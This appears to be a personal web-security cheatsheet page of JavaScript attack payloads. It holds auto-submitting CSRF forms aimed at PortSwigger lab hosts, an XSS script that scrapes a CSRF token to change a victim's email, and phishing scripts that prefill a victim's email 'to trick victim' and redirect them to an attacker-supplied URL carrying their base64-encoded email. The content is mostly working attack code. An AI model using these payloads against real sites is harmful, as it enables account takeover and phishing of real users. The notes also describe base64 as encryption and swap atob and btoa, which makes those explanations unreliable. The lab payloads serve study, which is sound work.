Javascript Crafting

PSG CSRF 1 : No Validation

<form method="POST" action="https://0a3700f504731a4780bc0d2500a000f6.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="ttttt@test.com">
</form>
<script>
        document.forms[0].submit();
</script>

PSG CSRF 2 : CSRF request method validation bypass using GET request instead of POST

    <form action="https://0a3200e70330e7bb86d263eb00300092.web-security-academy.net/my-account/change-email">
      <input type="hidden" name="email" value="wqwqqqqe&#64;dwa&#46;com" />
      <input type="hidden" name="csrf" value="57wADTL15Fs0pWIwqejKzreJVbVp80fO" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>

XSS to CSRF Changing email

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=t3st@test.com')
};
</script>

  1. Go to the account page

  2. Make POST request to change email

  3. Remember supply necessary parameter (can get from burp post request)

CSRF placing email bot from parameter and redirecting it to another host

   <script>
            function onWindowLoad() {
                const urlParams = new URLSearchParams(window.location.search);
                const email = urlParams.get('email');
		const destination = urlParams.get('url');
		var xhr = new XMLHttpRequest();
    		xhr.open('GET', destination, true);
		xhr.send();
		fetch(destination);
                var outputCdc = document.getElementById("gf-user");
                outputCdc.innerText=`${email}`;
            }
            window.onload = onWindowLoad;

            function redirected() {
              const urlParams = new URLSearchParams(window.location.search);
              const destination = urlParams.get('url');
              const email = urlParams.get('email');
              const emailb = btoa(email);
              if (destination) {
                window.location.href = destination + "&key=" + emailb;
              } else {
                window.location.href = 'defaultPage.html';
              }              
            }
    </script>

  1. Obtain email and url from victim opened link url will be used as redirected host

  2. Place the value of email into the input box as placeholder (to trick victim thinking its legit website)

  3. When victim press the Proceed button , they get redirected to url + key where key is their email encrypted in base64

CSRF placing email obtained from parameter

<script>
      window.onload = function() {
        const urlParams = new URLSearchParams(window.location.search);
        const emailb = urlParams.get('key');
        const email = atob(emailb);
        const inpele2 = document.getElementById('emailkau');
        const inpele3 = document.getElementById('displayName');
        inpele2.value = email;
        inpele3.textContent = email;
      };
    </script>

  1. Must have base64 email (key) of victim (atob to encrypt and btoa to decrypt base64)

  2. Pass in the value as email place holder to trick victim

PreviousPayloads / CheatsheetNextPDF

Last updated

Was this helpful?